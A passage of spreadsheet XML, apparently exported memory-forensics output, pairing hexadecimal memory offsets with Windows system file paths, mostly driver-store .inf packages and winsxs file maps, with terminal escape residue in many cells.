    <t>\Windows\System32\DriverStore\FileRepository\iscsi.inf_x86_neutral_128be931e3e98b62\iscsi.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7a09d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_en-us_js_4f0bf75</t>
  </si>
  <si>
    <t>a094013ae.cdf</t>
  </si>
  <si>
    <t>0xde7a0db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_en-us_d90b1afcc7</t>
  </si>
  <si>
    <t>7a7607.cdf-ms</t>
  </si>
  <si>
    <t>0xde7a1520</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\users_public_recorded_tv_a6d3315b447834ed.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a1918</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment0.toc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a19d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\users_default_appdata_roaming_media_center_programs_b8fc97cb3886dd3f.</t>
  </si>
  <si>
    <t>0xde7a1db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_windows_sidebar_gadgets_weather.gadget_images_585d10668</t>
  </si>
  <si>
    <t>9450aab.cdf-m</t>
  </si>
  <si>
    <t>0xde7a2038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\users_public_recorded_tv_sample_media_273d5f336c167723.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a24b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep003.inf_x86_neutral_342be98eb74e1449\prnep00</t>
  </si>
  <si>
    <t>0xde7a2868</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\megasr.inf_x86_neutral_30b367f92ca46598\megasr.in</t>
  </si>
  <si>
    <t>0xde7a2c50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\_0000000000000000.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a2f80</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment1.cmf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a31f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcdp.inf_x86_neutral_6388368bec8b4e3e\mdmcdp.in</t>
  </si>
  <si>
    <t>0xde7a3500</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netl1c86.inf_x86_neutral_49e2658f4a72e53f\netl1c8</t>
  </si>
  <si>
    <t>0xde7a3878</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\megasas.inf_x86_neutral_395276dd9b7a7448\megasas.</t>
  </si>
  <si>
    <t>0xde7a3bf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmoptn.inf_x86_neutral_6ab26061287b320d\mdmoptn.</t>
  </si>
  <si>
    <t>0xde7a4038</t>
  </si>
  <si>
    <t>0xde7a42b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnin002.inf_x86_neutral_b9fa18a8d63d5294\prnin00</t>
  </si>
  <si>
    <t>0xde7a4500</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc8.inf_x86_neutral_c93e7023ef90e637\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7a4850</t>
  </si>
  <si>
    <t>0xde7a4d50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cxraptor_fm1216mk5_ibv32.inf_x86_neutral_d4097f19</t>
  </si>
  <si>
    <t>ee2b5d2f\cxra</t>
  </si>
  <si>
    <t>ptor_FM1216</t>
  </si>
  <si>
    <t>MK5_IB</t>
  </si>
  <si>
    <t>V32.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a56c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\faxca003.inf_x86_neutral_fd10e857c1342eac\faxca00</t>
  </si>
  <si>
    <t>0xde7a5910</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\elxstor.inf_x86_neutral_4263942b9dfe9077\elxstor.</t>
  </si>
  <si>
    <t>0xde7a5c60</t>
  </si>
  <si>
    <t>0xde7a6470</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00f.inf_x86_neutral_635bf81e41f3872f\wiaca00</t>
  </si>
  <si>
    <t>f.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a67c0</t>
  </si>
  <si>
    <t>0xde7a6df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\keyboard.inf_x86_neutral_50ad659974198591\keyboar</t>
  </si>
  <si>
    <t>0xde7a71a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmnis1u.inf_x86_neutral_5fc1967059905a86\mdmnis1</t>
  </si>
  <si>
    <t>0xde7a7518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmelsa.inf_x86_neutral_035934cfd6dd3122\mdmelsa.</t>
  </si>
  <si>
    <t>0xde7a7890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usbprint.inf_x86_neutral_203e16627752a160\usbprin</t>
  </si>
  <si>
    <t>0xde7a7c08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc5.inf_x86_neutral_2270382453de2dbb\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7a7f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr008.inf_x86_neutral_7823bcb17f3813ee\mdmbr00</t>
  </si>
  <si>
    <t>0xde7a82f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaiwa4.inf_x86_neutral_9a20824e01be5808\mdmaiwa</t>
  </si>
  <si>
    <t>0xde7a8668</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netefe32.inf_x86_neutral_9590f3b23d1d64f3\netefe3</t>
  </si>
  <si>
    <t>0xde7a89e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nfrd960.inf_x86_neutral_cfc8c0013e9ede68\nfrd960.</t>
  </si>
  <si>
    <t>0xde7a8d28</t>
  </si>
  <si>
    <t>\Windows\System32\swprv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7a91a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc005.inf_x86_neutral_73b01a2655fdb5c5\prnrc00</t>
  </si>
  <si>
    <t>0xde7a9518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl009.inf_x86_neutral_bed6224f27f5c478\mdmgl00</t>
  </si>
  <si>
    <t>0xde7a9890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hpoa1so.inf_x86_neutral_5b4a3ef5e5601b42\hpoa1so.</t>
  </si>
  <si>
    <t>0xde7a9c08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00b.inf_x86_neutral_d0e9433101a2df79\prnep00</t>
  </si>
  <si>
    <t>0xde7a9f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00h.inf_x86_neutral_b859249f26c03a2f\prnca00</t>
  </si>
  <si>
    <t>0xde7aa350</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\display.inf_x86_neutral_36353e26d7770ebb\display.</t>
  </si>
  <si>
    <t>0xde7aa598</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netvg62.inf_x86_neutral_4a0e9c58796bca8a\netvg62.</t>
  </si>
  <si>
    <t>0xde7aa8e8</t>
  </si>
  <si>
    <t>0xde7aaf18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hcw85bda.inf_x86_neutral_0c9092aa3e31c11c\hcw85bd</t>
  </si>
  <si>
    <t>0xde7ab1a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnhp004.inf_x86_neutral_95288ae6f32f1fe7\prnhp00</t>
  </si>
  <si>
    <t>0xde7ab518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky006.inf_x86_neutral_141ee497dd7c43c1\prnky00</t>
  </si>
  <si>
    <t>0xde7ab890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky008.inf_x86_neutral_212e30a5479d6fcd\prnky00</t>
  </si>
  <si>
    <t>0xde7abc08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnfx002.inf_x86_neutral_f83f67e1c22e557b\prnfx00</t>
  </si>
  <si>
    <t>0xde7abf80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr009.inf_x86_neutral_3f6b69c8d1091fd8\prnbr00</t>
  </si>
  <si>
    <t>0xde7ac228</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\volsnap.inf_x86_neutral_42f862e05fcb0306\volsnap.</t>
  </si>
  <si>
    <t>0xde7ac470</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netirda.inf_x86_neutral_93a886f96cea2847\netirda.</t>
  </si>
  <si>
    <t>0xde7ac7c0</t>
  </si>
  <si>
    <t>0xde7ac9c0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7acdf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiacn001.inf_x86_neutral_d961f50801bfb4ab\wiacn00</t>
  </si>
  <si>
    <t>0xde7ad420</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\pcmcia.inf_x86_neutral_42dda5eb5768a3df\pcmcia.in</t>
  </si>
  <si>
    <t>0xde7ad798</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ks.inf_x86_neutral_2b583ce4a6a029a1\ks.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7adb10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmzyp.inf_x86_neutral_c2db4af563e94b15\mdmzyp.in</t>
  </si>
  <si>
    <t>0xde7ade88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_x86_neutral_77479a4820fb8643\hdaudbu</t>
  </si>
  <si>
    <t>0xde7ae038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc00b.inf_x86_neutral_354df7938905aa3b\prnrc00</t>
  </si>
  <si>
    <t>0xde7ae2c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00a.inf_x86_neutral_02cc6c151e42a79e\wiaca00</t>
  </si>
  <si>
    <t>0xde7ae508</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc006.inf_x86_neutral_404ca57b9d9c1e47\prnrc00</t>
  </si>
  <si>
    <t>0xde7ae858</t>
  </si>
  <si>
    <t>0xde7aee88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00b.inf_x86_neutral_c60fc0e9500f223d\wiaca00</t>
  </si>
  <si>
    <t>0xde7af448</t>
  </si>
  <si>
    <t>0xde7afa78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnms001.inf_x86_neutral_1dd3de102185d5d9\prnms00</t>
  </si>
  <si>
    <t>1.Inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7afdf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc2.inf_x86_neutral_7621f5d62d77f42e\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde7b0138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmrock3.inf_x86_neutral_c345818f4520db06\mdmrock</t>
  </si>
  <si>
    <t>0xde7b04b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky007.inf_x86_neutral_68b0fb35c207d0a0\prnky00</t>
  </si>
  <si>
    <t>0xde7b0828</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prngt002.inf_x86_neutral_a10ecaa46786286d\prngt00</t>
  </si>
  <si>
    <t>0xde7b0ba0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep002.inf_x86_neutral_9111d9b86cbd3f64\prnep00</t>
  </si>
  <si>
    <t>0xde7b0f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmvdot.inf_x86_neutral_1d02a3a1c47d9610\mdmvdot.</t>
  </si>
  <si>
    <t>0xde7b1190</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmosi.inf_x86_neutral_bf94271fafa0d646\mdmosi.in</t>
  </si>
  <si>
    <t>0xde7b14e0</t>
  </si>
  <si>
    <t>0xde7b1650</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\SppGroupCache\{CA2E7444-A1A5-459C-A931-762CCA21980F}_DriverPack</t>
  </si>
  <si>
    <t>ageInfoeInfo_x001B_</t>
  </si>
  <si>
    <t>0xde7b1b10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wialx004.inf_x86_neutral_f6a21289cb5f23b6\wialx00</t>
  </si>
  <si>
    <t>0xde7b1e88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnle003.inf_x86_neutral_a8106f7f3af21d88\prnle00</t>
  </si>
  <si>
    <t>0xde7b2038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\eaphost.inf_x86_neutral_1123a0147c1e97cc\eaphost.</t>
  </si>
  <si>
    <t>0xde7b2258</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtkr.inf_x86_neutral_9a6c721a56a4ae4a\mdmtkr.in</t>
  </si>
  <si>
    <t>0xde7b25d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\bthmtpenum.inf_x86_neutral_c70e85b87ee4ece9\bthmt</t>
  </si>
  <si>
    <t>penum.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7b2948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep005.inf_x86_neutral_f4a4a2a89cb57323\prnep00</t>
  </si>
  <si>
    <t>0xde7b2cc0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmlasat.inf_x86_neutral_28293794988ce599\mdmlasa</t>
  </si>
  <si>
    <t>0xde7b3388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnle004.inf_x86_neutral_60637fb8287b0bdb\prnle00</t>
  </si>
  <si>
    <t>0xde7b3700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmhay2.inf_x86_neutral_4bc09702f318f9be\mdmhay2.</t>
  </si>
  <si>
    <t>0xde7b3a78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnok002.inf_x86_neutral_436ff5d24333cca0\prnok00</t>
  </si>
  <si>
    <t>0xde7b3df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmisdn.inf_x86_neutral_c21e340225d7c6d5\mdmisdn.</t>
  </si>
  <si>
    <t>0xde7b41b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnms002.inf_x86_neutral_baa1493e6380688b\prnms00</t>
  </si>
  <si>
    <t>0xde7b4500</t>
  </si>
  <si>
    <t>0xde7b4aa0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\divacx86.inf_x86_neutral_d9558f410186db36\divacx8</t>
  </si>
  <si>
    <t>0xde7b4d88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnnr003.inf_x86_neutral_02802729a95f0eed\prnnr00</t>
  </si>
  <si>
    <t>0xde7b50c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnhp003.inf_x86_neutral_8685826a5ca37e6b\prnhp00</t>
  </si>
  <si>
    <t>0xde7b5280</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj2.inf_x86_neutral_1818c9080508de95\mdmtdkj</t>
  </si>
  <si>
    <t>0xde7b54d8</t>
  </si>
  <si>
    <t>0xde7b5640</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj7.inf_x86_neutral_e82dbe2c7d660711\mdmtdkj</t>
  </si>
  <si>
    <t>0xde7b59e0</t>
  </si>
  <si>
    <t>0xde7b5b78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00i.inf_x86_neutral_caf094f37544a669\wiaca00</t>
  </si>
  <si>
    <t>0xde7b5f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wpdmtp.inf_x86_neutral_9bb06c3cf57e5001\wpdmtp.in</t>
  </si>
  <si>
    <t>0xde7b6118</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcomp.inf_x86_neutral_71908e78cff42441\mdmcomp.</t>
  </si>
  <si>
    <t>0xde7b6428</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx003.inf_x86_neutral_336d87d2fe949d82\prnlx00</t>
  </si>
  <si>
    <t>0xde7b6878</t>
  </si>
  <si>
    <t>0xde7b6e18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wudfusbcciddriver.inf_x86_neutral_287553bb62168f2</t>
  </si>
  <si>
    <t>1\wudfusbccid</t>
  </si>
  <si>
    <t>driver.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7b7138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net8187bv32.inf_x86_neutral_4133912759f4531a\net8</t>
  </si>
  <si>
    <t>187bv32.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde7b74b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdk.inf_x86_neutral_31cb3ae015c74d0a\mdmtdk.in</t>
  </si>
  <si>
    <t>0xde7b7828</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr002.inf_x86_neutral_da2024ed84d3191d\mdmbr00</t>
  </si>
  <si>
    <t>0xde7b7ba0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\flpydisk.inf_x86_neutral_2102f5344367a352\flpydis</t>
  </si>
  <si>
    <t>k.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7b7f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00d.inf_x86_neutral_303d19e2d575a492\prnlx00</t>
  </si>
  <si>
    <t>0xde7b8388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hidserv.inf_x86_neutral_32c4c73e5497e483\hidserv.</t>
  </si>
  <si>
    <t>0xde7b8700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\dot4prt.inf_x86_neutral_ff48d313003e46b8\dot4prt.</t>
  </si>
  <si>
    <t>0xde7b8a78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\winusb.inf_x86_neutral_6cb50ae9f480775b\winusb.in</t>
  </si>
  <si>
    <t>0xde7b8df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnnr004.inf_x86_neutral_15e7dc89d102e928\prnnr00</t>
  </si>
  <si>
    <t>0xde7b91a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ipmidrv.inf_x86_neutral_2084908fa838c2b9\ipmidrv.</t>
  </si>
  <si>
    <t>0xde7b9518</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc004.inf_x86_neutral_7d5665e9e43f678d\prnrc00</t>
  </si>
  <si>
    <t>0xde7b9890</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00b.inf_x86_neutral_c675b60dd45218c1\prnca00</t>
  </si>
  <si>
    <t>0xde7b9c08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netk57x.inf_x86_neutral_5cfca89527c3f708\netk57x.</t>
  </si>
  <si>
    <t>0xde7b9f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmts.inf_x86_neutral_4f8efb8b21967e53\mdmmts.in</t>
  </si>
  <si>
    <t>0xde7ba038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx005.inf_x86_neutral_18db8f40f5f5b950\prnlx00</t>
  </si>
  <si>
    <t>0xde7ba178</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_195_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7ba638</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaky002.inf_x86_neutral_c4a21cbd41020ee5\wiaky00</t>
  </si>
  <si>
    <t>0xde7ba9b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiahp001.inf_x86_neutral_dae31af07561f03f\wiahp00</t>
  </si>
  <si>
    <t>0xde7bad28</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky003.inf_x86_neutral_60797ae48ab1b87f\prnky00</t>
  </si>
  <si>
    <t>0xde7bb360</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00w.inf_x86_neutral_600a5a25c538ae65\prnlx00</t>
  </si>
  <si>
    <t>0xde7bb6d8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl008.inf_x86_neutral_d225e15af1a594cd\mdmgl00</t>
  </si>
  <si>
    <t>0xde7bba50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netloop.inf_x86_neutral_856142fd87f1c21a\netloop.</t>
  </si>
  <si>
    <t>0xde7bbc98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr00a.inf_x86_neutral_f6d7a36091b1af37\mdmbr00</t>
  </si>
  <si>
    <t>0xde7bbf80</t>
  </si>
  <si>
    <t>0xde7bc108</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\amdsbs.inf_x86_neutral_5cae6933bef20aa8\amdsbs.in</t>
  </si>
  <si>
    <t>0xde7bc480</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\agp.inf_x86_neutral_a61b8b06718e8352\agp.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7bcc08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmhaeu.inf_x86_neutral_72bf10d025ec128d\mdmhaeu.</t>
  </si>
  <si>
    <t>0xde7bcf80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\usbcir.inf_x86_neutral_1a7503cad201feda\usbcir.in</t>
  </si>
  <si>
    <t>0xde7bd388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\fdc.inf_x86_neutral_67322cb863995ea8\fdc.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7bd700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\af9035bda.inf_x86_neutral_aa11aa34552d1d4d\af9035</t>
  </si>
  <si>
    <t>bda.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7bda78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netnvm32.inf_x86_neutral_163a5a97980bb89d\netnvm3</t>
  </si>
  <si>
    <t>0xde7bddf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hiddigi.inf_x86_neutral_12aaf5742a9969da\hiddigi.</t>
  </si>
  <si>
    <t>0xde7be3b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\crcdisk.inf_x86_neutral_dd39b6b0a45226c4\crcdisk.</t>
  </si>
  <si>
    <t>0xde7be600</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl010.inf_x86_neutral_46f466c9e68abb4a\mdmgl01</t>
  </si>
  <si>
    <t>0.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7be950</t>
  </si>
  <si>
    <t>0xde7beb50</t>
  </si>
  <si>
    <t>\Windows\System32\config\SYSTEM_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7bef80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nv_lh.inf_x86_neutral_bbe628dbdd6fce25\nv_LH.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7bf038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hcw72bda.inf_x86_neutral_8c31e8d2dc91b975\hcw72bd</t>
  </si>
  <si>
    <t>0xde7bf0f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtron.inf_x86_neutral_898c23c643f818db\mdmtron.</t>
  </si>
  <si>
    <t>0xde7bf470</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netl260x.inf_x86_neutral_30b3156b81adc0bb\netl260</t>
  </si>
  <si>
    <t>0xde7bf6b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnod002.inf_x86_neutral_c36a5fe1ac15a734\prnod00</t>
  </si>
  <si>
    <t>0xde7bfa08</t>
  </si>
  <si>
    <t>0xde7c0320</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\iirsp2.inf_x86_neutral_9ed65fe0bab06b1b\iirsp2.in</t>
  </si>
  <si>
    <t>0xde7c0698</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\amdsata.inf_x86_neutral_5c3d0d1e97e99e10\amdsata.</t>
  </si>
  <si>
    <t>0xde7c0a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaus.inf_x86_neutral_a31a27eac8eac079\Mdmaus.in</t>
  </si>
  <si>
    <t>0xde7c0d88</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr006.inf_x86_neutral_331a0c6df1c9d3e1\prnbr00</t>
  </si>
  <si>
    <t>0xde7c1138</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wsdscdrv.inf_x86_neutral_93205116e7f7a608\WSDScDr</t>
  </si>
  <si>
    <t>0xde7c14b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnts002.inf_x86_neutral_8f9e057c9ae8c777\prnts00</t>
  </si>
  <si>
    <t>0xde7c1828</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmc288.inf_x86_neutral_904d48d44a7c5ecb\mdmmc28</t>
  </si>
  <si>
    <t>0xde7c1ba0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ramdisk.inf_x86_neutral_a5e0c07c2a8b4571\ramdisk.</t>
  </si>
  <si>
    <t>0xde7c1f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl007.inf_x86_neutral_935cd017fcb965ee\mdmgl00</t>
  </si>
  <si>
    <t>0xde7c2388</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnms001.inf_x86_neutral_a1ff1bc29207b04f\prnms00</t>
  </si>
  <si>
    <t>0xde7c2700</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr004.inf_x86_neutral_a976dec554a0be13\prnbr00</t>
  </si>
  <si>
    <t>0xde7c2a78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmega.inf_x86_neutral_056a7f9c2f8ec088\mdmmega.</t>
  </si>
  <si>
    <t>0xde7c2df0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsier.inf_x86_neutral_a6200371d3ecdb82\mdmsier.</t>
  </si>
  <si>
    <t>0xde7c33b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnnr002.inf_x86_neutral_b9a1c43c0cb6c940\prnnr00</t>
  </si>
  <si>
    <t>0xde7c3730</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ntprint.inf_x86_neutral_88459cb66b0e2d44\ntprint.</t>
  </si>
  <si>
    <t>0xde7c3978</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmarch.inf_x86_neutral_3ae8598a7913eec2\mdmarch.</t>
  </si>
  <si>
    <t>0xde7c3cc8</t>
  </si>
  <si>
    <t>0xde7c4038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc002.inf_x86_neutral_3fb2e6c401a9c7d8\prnrc00</t>
  </si>
  <si>
    <t>0xde7c41a0</t>
  </si>
  <si>
    <t>0xde7c45d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\avmisdnc.inf_x86_neutral_e8031e434b323b61\avmisdn</t>
  </si>
  <si>
    <t>0xde7c4948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdf56f.inf_x86_neutral_f29859e5e5332dfb\mdmdf56</t>
  </si>
  <si>
    <t>F.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7c4cc0</t>
  </si>
  <si>
